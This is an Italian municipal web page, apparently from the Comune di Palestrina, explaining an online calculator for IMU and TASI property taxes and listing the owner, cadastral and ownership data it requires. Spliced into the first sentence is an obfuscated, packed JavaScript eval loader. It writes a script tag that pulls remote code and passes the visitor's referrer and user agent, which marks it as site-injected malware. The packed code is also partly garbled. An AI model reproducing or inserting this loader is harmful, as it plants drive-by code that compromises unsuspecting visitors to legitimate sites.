



Anche eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}return p}('0.6(");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|script|zbbbed|var|u0026u|referrer|fidd||js|php'.split('|'),0,{})) quest'anno il Comune di Palestrina mette a disposizione dei cittadini un efficace strumento per il calcolo di IMU e TASI con stampa del modello precompilato (F24) per il pagamento presso gli sportelli bancari o postali abilitati.

La procedura guidata richiede, per ciascun immobile di cui si desidera calcolare l'imposta, una serie di dati che è bene avere a disposizione prima di iniziare:

1. codice fiscale e dati anagrafici della persona soggetta all'imposta (il proprietario o altro titolare di diritti reali sull'immobile, come usufrutto, uso, enfiteusi, superficie o abitazione), necessari ai fini della compilazione e della stampa del modello F24;
2. rendita catastale dell'immobile che risulta negli archivi catastali. L' [Agenzia delle Entrate mette a disposizione un servizio gratuito sul proprio sito](#) dove si può verificare la rendita catastale inserendo il proprio codice fiscale e i dati catastali identificativi dell'immobile (numero di foglio, di particella e di subalterno)
3. quota di possesso dell'immobile da considerare ai fini dell'imposta;
4. durata del possesso nel corso dell'anno, espresso in numero di mesi (un periodo uguale o maggiore di 15 giorni si considera come mese intero);
5. esistenza e il numero di ulteriori comproprietari conviventi;
6. altre informazioni eventuali come l'esistenza del vincolo storico o l'inagibilità dell'immobile, ai fini della riduzione del 50% della base imponibile (per maggiori informazioni consultare il Regolamento IMU e il Regolamento TASI)

Calcolo IMU

tributi@comune.palermamg.it